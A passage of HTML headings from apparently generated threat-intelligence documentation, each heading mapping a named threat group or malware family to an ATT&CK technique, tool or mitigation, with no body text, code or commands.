<h3 id="_advstoreshell_s0045_uses_execution_through_api_t1106"><a class="anchor" href="#_advstoreshell_s0045_uses_execution_through_api_t1106"></a><a class="link" href="#_advstoreshell_s0045_uses_execution_through_api_t1106">ADVSTORESHELL (S0045) uses Execution through API (T1106)</a></h3>
</div>
<div class="sect2">
<h3 id="_daserf_s0187_uses_software_packing_t1045"><a class="anchor" href="#_daserf_s0187_uses_software_packing_t1045"></a><a class="link" href="#_daserf_s0187_uses_software_packing_t1045">Daserf (S0187) uses Software Packing (T1045)</a></h3>
</div>
<div class="sect2">
<h3 id="_lazarus_group_g0032_uses_system_information_discovery_t1082"><a class="anchor" href="#_lazarus_group_g0032_uses_system_information_discovery_t1082"></a><a class="link" href="#_lazarus_group_g0032_uses_system_information_discovery_t1082">Lazarus Group (G0032) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_cosmicduke_s0050_uses_data_from_removable_media_t1025"><a class="anchor" href="#_cosmicduke_s0050_uses_data_from_removable_media_t1025"></a><a class="link" href="#_cosmicduke_s0050_uses_data_from_removable_media_t1025">CosmicDuke (S0050) uses Data from Removable Media (T1025)</a></h3>
</div>
<div class="sect2">
<h3 id="_application_shimming_mitigation_t1138_mitigates_application_shimming_t1138"><a class="anchor" href="#_application_shimming_mitigation_t1138_mitigates_application_shimming_t1138"></a><a class="link" href="#_application_shimming_mitigation_t1138_mitigates_application_shimming_t1138">Application Shimming Mitigation (T1138) mitigates Application Shimming (T1138)</a></h3>
</div>
<div class="sect2">
<h3 id="_magic_hound_g0059_uses_scripting_t1064"><a class="anchor" href="#_magic_hound_g0059_uses_scripting_t1064"></a><a class="link" href="#_magic_hound_g0059_uses_scripting_t1064">Magic Hound (G0059) uses Scripting (T1064)</a></h3>
</div>
<div class="sect2">
<h3 id="_custom_command_and_control_protocol_mitigation_t1094_mitigates_custom_command_and_control_protocol_t1094"><a class="anchor" href="#_custom_command_and_control_protocol_mitigation_t1094_mitigates_custom_command_and_control_protocol_t1094"></a><a class="link" href="#_custom_command_and_control_protocol_mitigation_t1094_mitigates_custom_command_and_control_protocol_t1094">Custom Command and Control Protocol Mitigation (T1094) mitigates Custom Command and Control Protocol (T1094)</a></h3>
</div>
<div class="sect2">
<h3 id="_xagentosx_s0161_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_xagentosx_s0161_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_xagentosx_s0161_uses_file_and_directory_discovery_t1083">XAgentOSX (S0161) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_net_crawler_s0056_uses_credential_dumping_t1003"><a class="anchor" href="#_net_crawler_s0056_uses_credential_dumping_t1003"></a><a class="link" href="#_net_crawler_s0056_uses_credential_dumping_t1003">Net Crawler (S0056) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_backspace_s0031_uses_multi_stage_channels_t1104"><a class="anchor" href="#_backspace_s0031_uses_multi_stage_channels_t1104"></a><a class="link" href="#_backspace_s0031_uses_multi_stage_channels_t1104">BACKSPACE (S0031) uses Multi-Stage Channels (T1104)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt1_g0006_uses_masquerading_t1036"><a class="anchor" href="#_apt1_g0006_uses_masquerading_t1036"></a><a class="link" href="#_apt1_g0006_uses_masquerading_t1036">APT1 (G0006) uses Masquerading (T1036)</a></h3>
</div>
<div class="sect2">
<h3 id="_menupass_g0045_uses_remote_services_t1021"><a class="anchor" href="#_menupass_g0045_uses_remote_services_t1021"></a><a class="link" href="#_menupass_g0045_uses_remote_services_t1021">menuPass (G0045) uses Remote Services (T1021)</a></h3>
</div>
<div class="sect2">
<h3 id="_psylo_s0078_uses_exfiltration_over_command_and_control_channel_t1041"><a class="anchor" href="#_psylo_s0078_uses_exfiltration_over_command_and_control_channel_t1041"></a><a class="link" href="#_psylo_s0078_uses_exfiltration_over_command_and_control_channel_t1041">Psylo (S0078) uses Exfiltration Over Command and Control Channel (T1041)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt3_g0022_uses_remote_desktop_protocol_t1076"><a class="anchor" href="#_apt3_g0022_uses_remote_desktop_protocol_t1076"></a><a class="link" href="#_apt3_g0022_uses_remote_desktop_protocol_t1076">APT3 (G0022) uses Remote Desktop Protocol (T1076)</a></h3>
</div>
<div class="sect2">
<h3 id="_remotecmd_s0166_uses_scheduled_task_t1053"><a class="anchor" href="#_remotecmd_s0166_uses_scheduled_task_t1053"></a><a class="link" href="#_remotecmd_s0166_uses_scheduled_task_t1053">RemoteCMD (S0166) uses Scheduled Task (T1053)</a></h3>
</div>
<div class="sect2">
<h3 id="_magic_hound_g0059_uses_process_discovery_t1057"><a class="anchor" href="#_magic_hound_g0059_uses_process_discovery_t1057"></a><a class="link" href="#_magic_hound_g0059_uses_process_discovery_t1057">Magic Hound (G0059) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_felismus_s0171_uses_system_information_discovery_t1082"><a class="anchor" href="#_felismus_s0171_uses_system_information_discovery_t1082"></a><a class="link" href="#_felismus_s0171_uses_system_information_discovery_t1082">Felismus (S0171) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin7_g0046_uses_halfbaked_s0151"><a class="anchor" href="#_fin7_g0046_uses_halfbaked_s0151"></a><a class="link" href="#_fin7_g0046_uses_halfbaked_s0151">FIN7 (G0046) uses HALFBAKED (S0151)</a></h3>
</div>
<div class="sect2">
<h3 id="_ke3chang_g0004_uses_system_network_configuration_discovery_t1016"><a class="anchor" href="#_ke3chang_g0004_uses_system_network_configuration_discovery_t1016"></a><a class="link" href="#_ke3chang_g0004_uses_system_network_configuration_discovery_t1016">Ke3chang (G0004) uses System Network Configuration Discovery (T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_naikon_g0019_uses_hdoor_s0061"><a class="anchor" href="#_naikon_g0019_uses_hdoor_s0061"></a><a class="link" href="#_naikon_g0019_uses_hdoor_s0061">Naikon (G0019) uses HDoor (S0061)</a></h3>
</div>
<div class="sect2">
<h3 id="_stealth_falcon_g0038_uses_standard_cryptographic_protocol_t1032"><a class="anchor" href="#_stealth_falcon_g0038_uses_standard_cryptographic_protocol_t1032"></a><a class="link" href="#_stealth_falcon_g0038_uses_standard_cryptographic_protocol_t1032">Stealth Falcon (G0038) uses Standard Cryptographic Protocol (T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_admin_338_g0018_uses_system_network_configuration_discovery_t1016"><a class="anchor" href="#_admin_338_g0018_uses_system_network_configuration_discovery_t1016"></a><a class="link" href="#_admin_338_g0018_uses_system_network_configuration_discovery_t1016">admin@338 (G0018) uses System Network Configuration Discovery (T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_rover_s0090_uses_data_staged_t1074"><a class="anchor" href="#_rover_s0090_uses_data_staged_t1074"></a><a class="link" href="#_rover_s0090_uses_data_staged_t1074">Rover (S0090) uses Data Staged (T1074)</a></h3>
</div>
<div class="sect2">
<h3 id="_osinfo_s0165_uses_system_network_configuration_discovery_t1016"><a class="anchor" href="#_osinfo_s0165_uses_system_network_configuration_discovery_t1016"></a><a class="link" href="#_osinfo_s0165_uses_system_network_configuration_discovery_t1016">OSInfo (S0165) uses System Network Configuration Discovery (T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt29_g0016_uses_geminiduke_s0049"><a class="anchor" href="#_apt29_g0016_uses_geminiduke_s0049"></a><a class="link" href="#_apt29_g0016_uses_geminiduke_s0049">APT29 (G0016) uses GeminiDuke (S0049)</a></h3>
</div>
<div class="sect2">
<h3 id="_crimson_s0115_uses_security_software_discovery_t1063"><a class="anchor" href="#_crimson_s0115_uses_security_software_discovery_t1063"></a><a class="link" href="#_crimson_s0115_uses_security_software_discovery_t1063">Crimson (S0115) uses Security Software Discovery (T1063)</a></h3>
</div>
<div class="sect2">
<h3 id="_wingbird_s0176_uses_file_deletion_t1107"><a class="anchor" href="#_wingbird_s0176_uses_file_deletion_t1107"></a><a class="link" href="#_wingbird_s0176_uses_file_deletion_t1107">Wingbird (S0176) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_fakem_s0076_uses_standard_cryptographic_protocol_t1032"><a class="anchor" href="#_fakem_s0076_uses_standard_cryptographic_protocol_t1032"></a><a class="link" href="#_fakem_s0076_uses_standard_cryptographic_protocol_t1032">FakeM (S0076) uses Standard Cryptographic Protocol (T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_xtunnel_s0117_uses_binary_padding_t1009"><a class="anchor" href="#_xtunnel_s0117_uses_binary_padding_t1009"></a><a class="link" href="#_xtunnel_s0117_uses_binary_padding_t1009">XTunnel (S0117) uses Binary Padding (T1009)</a></h3>
</div>
<div class="sect2">
<h3 id="_helminth_s0170_uses_powershell_t1086"><a class="anchor" href="#_helminth_s0170_uses_powershell_t1086"></a><a class="link" href="#_helminth_s0170_uses_powershell_t1086">Helminth (S0170) uses PowerShell (T1086)</a></h3>
</div>
<div class="sect2">
<h3 id="_helminth_s0170_uses_shortcut_modification_t1023"><a class="anchor" href="#_helminth_s0170_uses_shortcut_modification_t1023"></a><a class="link" href="#_helminth_s0170_uses_shortcut_modification_t1023">Helminth (S0170) uses Shortcut Modification (T1023)</a></h3>
</div>
<div class="sect2">
<h3 id="_netstat_s0104_uses_system_network_connections_discovery_t1049"><a class="anchor" href="#_netstat_s0104_uses_system_network_connections_discovery_t1049"></a><a class="link" href="#_netstat_s0104_uses_system_network_connections_discovery_t1049">netstat (S0104) uses System Network Connections Discovery (T1049)</a></h3>
</div>
<div class="sect2">
<h3 id="_volgmer_s0180_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_volgmer_s0180_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_volgmer_s0180_uses_file_and_directory_discovery_t1083">Volgmer (S0180) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_usbstealer_s0136_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_usbstealer_s0136_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_usbstealer_s0136_uses_file_and_directory_discovery_t1083">USBStealer (S0136) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_molerats_g0021_uses_code_signing_t1116"><a class="anchor" href="#_molerats_g0021_uses_code_signing_t1116"></a><a class="link" href="#_molerats_g0021_uses_code_signing_t1116">Molerats (G0021) uses Code Signing (T1116)</a></h3>
</div>
<div class="sect2">
<h3 id="_sslmm_s0058_uses_fallback_channels_t1008"><a class="anchor" href="#_sslmm_s0058_uses_fallback_channels_t1008"></a><a class="link" href="#_sslmm_s0058_uses_fallback_channels_t1008">SslMM (S0058) uses Fallback Channels (T1008)</a></h3>
</div>
<div class="sect2">
<h3 id="_pinchduke_s0048_uses_data_from_local_system_t1005"><a class="anchor" href="#_pinchduke_s0048_uses_data_from_local_system_t1005"></a><a class="link" href="#_pinchduke_s0048_uses_data_from_local_system_t1005">PinchDuke (S0048) uses Data from Local System (T1005)</a></h3>
</div>
<div class="sect2">
<h3 id="_backdoor_oldrea_s0093_uses_process_discovery_t1057"><a class="anchor" href="#_backdoor_oldrea_s0093_uses_process_discovery_t1057"></a><a class="link" href="#_backdoor_oldrea_s0093_uses_process_discovery_t1057">Backdoor.Oldrea (S0093) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_powerduke_s0139_uses_obfuscated_files_or_information_t1027"><a class="anchor" href="#_powerduke_s0139_uses_obfuscated_files_or_information_t1027"></a><a class="link" href="#_powerduke_s0139_uses_obfuscated_files_or_information_t1027">PowerDuke (S0139) uses Obfuscated Files or Information (T1027)</a></h3>
</div>
<div class="sect2">
<h3 id="_threat_group_3390_g0027_uses_valid_accounts_t1078"><a class="anchor" href="#_threat_group_3390_g0027_uses_valid_accounts_t1078"></a><a class="link" href="#_threat_group_3390_g0027_uses_valid_accounts_t1078">Threat Group-3390 (G0027) uses Valid Accounts (T1078)</a></h3>
</div>
<div class="sect2">
<h3 id="_winnti_group_g0044_uses_rootkit_t1014"><a class="anchor" href="#_winnti_group_g0044_uses_rootkit_t1014"></a><a class="link" href="#_winnti_group_g0044_uses_rootkit_t1014">Winnti Group (G0044) uses Rootkit (T1014)</a></h3>
</div>
<div class="sect2">
<h3 id="_daserf_s0187_uses_standard_cryptographic_protocol_t1032"><a class="anchor" href="#_daserf_s0187_uses_standard_cryptographic_protocol_t1032"></a><a class="link" href="#_daserf_s0187_uses_standard_cryptographic_protocol_t1032">Daserf (S0187) uses Standard Cryptographic Protocol (T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_cleaver_g0003_uses_credential_dumping_t1003"><a class="anchor" href="#_cleaver_g0003_uses_credential_dumping_t1003"></a><a class="link" href="#_cleaver_g0003_uses_credential_dumping_t1003">Cleaver (G0003) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_darkhotel_g0012_uses_input_capture_t1056"><a class="anchor" href="#_darkhotel_g0012_uses_input_capture_t1056"></a><a class="link" href="#_darkhotel_g0012_uses_input_capture_t1056">Darkhotel (G0012) uses Input Capture (T1056)</a></h3>
</div>
<div class="sect2">
<h3 id="_isminjector_s0189_uses_deobfuscate_decode_files_or_information_t1140"><a class="anchor" href="#_isminjector_s0189_uses_deobfuscate_decode_files_or_information_t1140"></a><a class="link" href="#_isminjector_s0189_uses_deobfuscate_decode_files_or_information_t1140">ISMInjector (S0189) uses Deobfuscate/Decode Files or Information (T1140)</a></h3>
</div>
<div class="sect2">
<h3 id="_sslmm_s0058_uses_shortcut_modification_t1023"><a class="anchor" href="#_sslmm_s0058_uses_shortcut_modification_t1023"></a><a class="link" href="#_sslmm_s0058_uses_shortcut_modification_t1023">SslMM (S0058) uses Shortcut Modification (T1023)</a></h3>
</div>
<div class="sect2">
<h3 id="_usbstealer_s0136_uses_communication_through_removable_media_t1092"><a class="anchor" href="#_usbstealer_s0136_uses_communication_through_removable_media_t1092"></a><a class="link" href="#_usbstealer_s0136_uses_communication_through_removable_media_t1092">USBStealer (S0136) uses Communication Through Removable Media (T1092)</a></h3>
</div>
<div class="sect2">
<h3 id="_evilgrab_s0152_uses_screen_capture_t1113"><a class="anchor" href="#_evilgrab_s0152_uses_screen_capture_t1113"></a><a class="link" href="#_evilgrab_s0152_uses_screen_capture_t1113">EvilGrab (S0152) uses Screen Capture (T1113)</a></h3>
</div>
<div class="sect2">
<h3 id="_soundbite_s0157_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_soundbite_s0157_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_soundbite_s0157_uses_standard_application_layer_protocol_t1071">SOUNDBITE (S0157) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_bronze_butler_g0060_uses_account_discovery_t1087"><a class="anchor" href="#_bronze_butler_g0060_uses_account_discovery_t1087"></a><a class="link" href="#_bronze_butler_g0060_uses_account_discovery_t1087">BRONZE BUTLER (G0060) uses Account Discovery (T1087)</a></h3>
</div>
<div class="sect2">
<h3 id="_netsh_s0108_uses_connection_proxy_t1090"><a class="anchor" href="#_netsh_s0108_uses_connection_proxy_t1090"></a><a class="link" href="#_netsh_s0108_uses_connection_proxy_t1090">netsh (S0108) uses Connection Proxy (T1090)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt3_g0022_uses_uncommonly_used_port_t1065"><a class="anchor" href="#_apt3_g0022_uses_uncommonly_used_port_t1065"></a><a class="link" href="#_apt3_g0022_uses_uncommonly_used_port_t1065">APT3 (G0022) uses Uncommonly Used Port (T1065)</a></h3>
</div>
<div class="sect2">
<h3 id="_powruner_s0184_uses_powershell_t1086"><a class="anchor" href="#_powruner_s0184_uses_powershell_t1086"></a><a class="link" href="#_powruner_s0184_uses_powershell_t1086">POWRUNER (S0184) uses PowerShell (T1086)</a></h3>
</div>
<div class="sect2">
<h3 id="_dustysky_s0062_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_dustysky_s0062_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_dustysky_s0062_uses_standard_application_layer_protocol_t1071">DustySky (S0062) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_cleaver_g0003_uses_tinyzbot_s0004"><a class="anchor" href="#_cleaver_g0003_uses_tinyzbot_s0004"></a><a class="link" href="#_cleaver_g0003_uses_tinyzbot_s0004">Cleaver (G0003) uses TinyZBot (S0004)</a></h3>
</div>
<div class="sect2">
<h3 id="_geminiduke_s0049_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_geminiduke_s0049_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_geminiduke_s0049_uses_file_and_directory_discovery_t1083">GeminiDuke (S0049) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_snugride_s0159_uses_standard_cryptographic_protocol_t1032"><a class="anchor" href="#_snugride_s0159_uses_standard_cryptographic_protocol_t1032"></a><a class="link" href="#_snugride_s0159_uses_standard_cryptographic_protocol_t1032">SNUGRIDE (S0159) uses Standard Cryptographic Protocol (T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_ke3chang_g0004_uses_process_discovery_t1057"><a class="anchor" href="#_ke3chang_g0004_uses_process_discovery_t1057"></a><a class="link" href="#_ke3chang_g0004_uses_process_discovery_t1057">Ke3chang (G0004) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_remsec_s0125_uses_process_discovery_t1057"><a class="anchor" href="#_remsec_s0125_uses_process_discovery_t1057"></a><a class="link" href="#_remsec_s0125_uses_process_discovery_t1057">Remsec (S0125) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin10_g0051_uses_system_owner_user_discovery_t1033"><a class="anchor" href="#_fin10_g0051_uses_system_owner_user_discovery_t1033"></a><a class="link" href="#_fin10_g0051_uses_system_owner_user_discovery_t1033">FIN10 (G0051) uses System Owner/User Discovery (T1033)</a></h3>
</div>
<div class="sect2">
<h3 id="_kasidet_s0088_uses_disabling_security_tools_t1089"><a class="anchor" href="#_kasidet_s0088_uses_disabling_security_tools_t1089"></a><a class="link" href="#_kasidet_s0088_uses_disabling_security_tools_t1089">Kasidet (S0088) uses Disabling Security Tools (T1089)</a></h3>
</div>
<div class="sect2">
<h3 id="_calendar_s0025_uses_web_service_t1102"><a class="anchor" href="#_calendar_s0025_uses_web_service_t1102"></a><a class="link" href="#_calendar_s0025_uses_web_service_t1102">CALENDAR (S0025) uses Web Service (T1102)</a></h3>
</div>
<div class="sect2">
<h3 id="_emissary_s0082_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_emissary_s0082_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_emissary_s0082_uses_standard_application_layer_protocol_t1071">Emissary (S0082) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_process_discovery_t1057"><a class="anchor" href="#_apt28_g0007_uses_process_discovery_t1057"></a><a class="link" href="#_apt28_g0007_uses_process_discovery_t1057">APT28 (G0007) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_axiom_g0001_uses_accessibility_features_t1015"><a class="anchor" href="#_axiom_g0001_uses_accessibility_features_t1015"></a><a class="link" href="#_axiom_g0001_uses_accessibility_features_t1015">Axiom (G0001) uses Accessibility Features (T1015)</a></h3>
</div>
<div class="sect2">
<h3 id="_stealth_falcon_g0038_uses_process_discovery_t1057"><a class="anchor" href="#_stealth_falcon_g0038_uses_process_discovery_t1057"></a><a class="link" href="#_stealth_falcon_g0038_uses_process_discovery_t1057">Stealth Falcon (G0038) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_rover_s0090_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_rover_s0090_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_rover_s0090_uses_file_and_directory_discovery_t1083">Rover (S0090) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt32_g0050_uses_powershell_t1086"><a class="anchor" href="#_apt32_g0050_uses_powershell_t1086"></a><a class="link" href="#_apt32_g0050_uses_powershell_t1086">APT32 (G0050) uses PowerShell (T1086)</a></h3>
</div>
<div class="sect2">
<h3 id="_agent_btz_s0092_uses_exfiltration_over_physical_medium_t1052"><a class="anchor" href="#_agent_btz_s0092_uses_exfiltration_over_physical_medium_t1052"></a><a class="link" href="#_agent_btz_s0092_uses_exfiltration_over_physical_medium_t1052">Agent.btz (S0092) uses Exfiltration Over Physical Medium (T1052)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin7_g0046_uses_remote_file_copy_t1105"><a class="anchor" href="#_fin7_g0046_uses_remote_file_copy_t1105"></a><a class="link" href="#_fin7_g0046_uses_remote_file_copy_t1105">FIN7 (G0046) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_tdtess_s0164_uses_remote_file_copy_t1105"><a class="anchor" href="#_tdtess_s0164_uses_remote_file_copy_t1105"></a><a class="link" href="#_tdtess_s0164_uses_remote_file_copy_t1105">TDTESS (S0164) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_data_obfuscation_t1001"><a class="anchor" href="#_apt28_g0007_uses_data_obfuscation_t1001"></a><a class="link" href="#_apt28_g0007_uses_data_obfuscation_t1001">APT28 (G0007) uses Data Obfuscation (T1001)</a></h3>
</div>
<div class="sect2">
<h3 id="_equation_g0020_uses_component_firmware_t1109"><a class="anchor" href="#_equation_g0020_uses_component_firmware_t1109"></a><a class="link" href="#_equation_g0020_uses_component_firmware_t1109">Equation (G0020) uses Component Firmware (T1109)</a></h3>
</div>
<div class="sect2">
<h3 id="_cmd_s0106_uses_file_deletion_t1107"><a class="anchor" href="#_cmd_s0106_uses_file_deletion_t1107"></a><a class="link" href="#_cmd_s0106_uses_file_deletion_t1107">cmd (S0106) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt29_g0016_uses_cloudduke_s0054"><a class="anchor" href="#_apt29_g0016_uses_cloudduke_s0054"></a><a class="link" href="#_apt29_g0016_uses_cloudduke_s0054">APT29 (G0016) uses CloudDuke (S0054)</a></h3>
</div>
<div class="sect2">
<h3 id="_lazarus_group_g0032_uses_remote_desktop_protocol_t1076"><a class="anchor" href="#_lazarus_group_g0032_uses_remote_desktop_protocol_t1076"></a><a class="link" href="#_lazarus_group_g0032_uses_remote_desktop_protocol_t1076">Lazarus Group (G0032) uses Remote Desktop Protocol (T1076)</a></h3>
</div>
<div class="sect2">
<h3 id="_menupass_g0045_uses_mimikatz_s0002"><a class="anchor" href="#_menupass_g0045_uses_mimikatz_s0002"></a><a class="link" href="#_menupass_g0045_uses_mimikatz_s0002">menuPass (G0045) uses Mimikatz (S0002)</a></h3>
</div>
<div class="sect2">
<h3 id="_cobalt_strike_s0154_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_cobalt_strike_s0154_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_cobalt_strike_s0154_uses_standard_application_layer_protocol_t1071">Cobalt Strike (S0154) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_carbanak_g0008_uses_valid_accounts_t1078"><a class="anchor" href="#_carbanak_g0008_uses_valid_accounts_t1078"></a><a class="link" href="#_carbanak_g0008_uses_valid_accounts_t1078">Carbanak (G0008) uses Valid Accounts (T1078)</a></h3>
</div>
<div class="sect2">
<h3 id="_blackenergy_s0089_uses_windows_admin_shares_t1077"><a class="anchor" href="#_blackenergy_s0089_uses_windows_admin_shares_t1077"></a><a class="link" href="#_blackenergy_s0089_uses_windows_admin_shares_t1077">BlackEnergy (S0089) uses Windows Admin Shares (T1077)</a></h3>
</div>
<div class="sect2">
<h3 id="_magic_hound_g0059_uses_uncommonly_used_port_t1065"><a class="anchor" href="#_magic_hound_g0059_uses_uncommonly_used_port_t1065"></a><a class="link" href="#_magic_hound_g0059_uses_uncommonly_used_port_t1065">Magic Hound (G0059) uses Uncommonly Used Port (T1065)</a></h3>
</div>
<div class="sect2">
<h3 id="_dustysky_s0062_uses_system_information_discovery_t1082"><a class="anchor" href="#_dustysky_s0062_uses_system_information_discovery_t1082"></a><a class="link" href="#_dustysky_s0062_uses_system_information_discovery_t1082">DustySky (S0062) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_magic_hound_g0059_uses_system_information_discovery_t1082"><a class="anchor" href="#_magic_hound_g0059_uses_system_information_discovery_t1082"></a><a class="link" href="#_magic_hound_g0059_uses_system_information_discovery_t1082">Magic Hound (G0059) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_coreshell_s0137_uses_system_information_discovery_t1082"><a class="anchor" href="#_coreshell_s0137_uses_system_information_discovery_t1082"></a><a class="link" href="#_coreshell_s0137_uses_system_information_discovery_t1082">CORESHELL (S0137) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt29_g0016_uses_indicator_removal_on_host_t1070"><a class="anchor" href="#_apt29_g0016_uses_indicator_removal_on_host_t1070"></a><a class="link" href="#_apt29_g0016_uses_indicator_removal_on_host_t1070">APT29 (G0016) uses Indicator Removal on Host (T1070)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt29_g0016_uses_powerduke_s0139"><a class="anchor" href="#_apt29_g0016_uses_powerduke_s0139"></a><a class="link" href="#_apt29_g0016_uses_powerduke_s0139">APT29 (G0016) uses PowerDuke (S0139)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt3_g0022_uses_software_packing_t1045"><a class="anchor" href="#_apt3_g0022_uses_software_packing_t1045"></a><a class="link" href="#_apt3_g0022_uses_software_packing_t1045">APT3 (G0022) uses Software Packing (T1045)</a></h3>
</div>
<div class="sect2">
<h3 id="_s_type_s0085_uses_commonly_used_port_t1043"><a class="anchor" href="#_s_type_s0085_uses_commonly_used_port_t1043"></a><a class="link" href="#_s_type_s0085_uses_commonly_used_port_t1043">S-Type (S0085) uses Commonly Used Port (T1043)</a></h3>
</div>
<div class="sect2">
<h3 id="_service_execution_mitigation_t1035_mitigates_service_execution_t1035"><a class="anchor" href="#_service_execution_mitigation_t1035_mitigates_service_execution_t1035"></a><a class="link" href="#_service_execution_mitigation_t1035_mitigates_service_execution_t1035">Service Execution Mitigation (T1035) mitigates Service Execution (T1035)</a></h3>
</div>
<div class="sect2">
<h3 id="_sakula_s0074_uses_rundll32_t1085"><a class="anchor" href="#_sakula_s0074_uses_rundll32_t1085"></a><a class="link" href="#_sakula_s0074_uses_rundll32_t1085">Sakula (S0074) uses Rundll32 (T1085)</a></h3>
</div>
<div class="sect2">
<h3 id="_bbsrat_s0127_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_bbsrat_s0127_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_bbsrat_s0127_uses_file_and_directory_discovery_t1083">BBSRAT (S0127) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_prikormka_s0113_uses_screen_capture_t1113"><a class="anchor" href="#_prikormka_s0113_uses_screen_capture_t1113"></a><a class="link" href="#_prikormka_s0113_uses_screen_capture_t1113">Prikormka (S0113) uses Screen Capture (T1113)</a></h3>
</div>
<div class="sect2">
<h3 id="_china_chopper_s0020_uses_web_shell_t1100"><a class="anchor" href="#_china_chopper_s0020_uses_web_shell_t1100"></a><a class="link" href="#_china_chopper_s0020_uses_web_shell_t1100">China Chopper (S0020) uses Web Shell (T1100)</a></h3>
</div>
<div class="sect2">
<h3 id="_powerduke_s0139_uses_command_line_interface_t1059"><a class="anchor" href="#_powerduke_s0139_uses_command_line_interface_t1059"></a><a class="link" href="#_powerduke_s0139_uses_command_line_interface_t1059">PowerDuke (S0139) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_bronze_butler_g0060_uses_remote_system_discovery_t1018"><a class="anchor" href="#_bronze_butler_g0060_uses_remote_system_discovery_t1018"></a><a class="link" href="#_bronze_butler_g0060_uses_remote_system_discovery_t1018">BRONZE BUTLER (G0060) uses Remote System Discovery (T1018)</a></h3>
</div>
<div class="sect2">
<h3 id="_bash_history_mitigation_t1139_mitigates_bash_history_t1139"><a class="anchor" href="#_bash_history_mitigation_t1139_mitigates_bash_history_t1139"></a><a class="link" href="#_bash_history_mitigation_t1139_mitigates_bash_history_t1139">Bash History Mitigation (T1139) mitigates Bash History (T1139)</a></h3>
</div>
<div class="sect2">
<h3 id="_taidoor_s0011_uses_custom_cryptographic_protocol_t1024"><a class="anchor" href="#_taidoor_s0011_uses_custom_cryptographic_protocol_t1024"></a><a class="link" href="#_taidoor_s0011_uses_custom_cryptographic_protocol_t1024">Taidoor (S0011) uses Custom Cryptographic Protocol (T1024)</a></h3>
</div>
<div class="sect2">
<h3 id="_scheduled_transfer_mitigation_t1029_mitigates_scheduled_transfer_t1029"><a class="anchor" href="#_scheduled_transfer_mitigation_t1029_mitigates_scheduled_transfer_t1029"></a><a class="link" href="#_scheduled_transfer_mitigation_t1029_mitigates_scheduled_transfer_t1029">Scheduled Transfer Mitigation (T1029) mitigates Scheduled Transfer (T1029)</a></h3>
</div>
<div class="sect2">
<h3 id="_helminth_s0170_uses_code_signing_t1116"><a class="anchor" href="#_helminth_s0170_uses_code_signing_t1116"></a><a class="link" href="#_helminth_s0170_uses_code_signing_t1116">Helminth (S0170) uses Code Signing (T1116)</a></h3>
</div>
<div class="sect2">
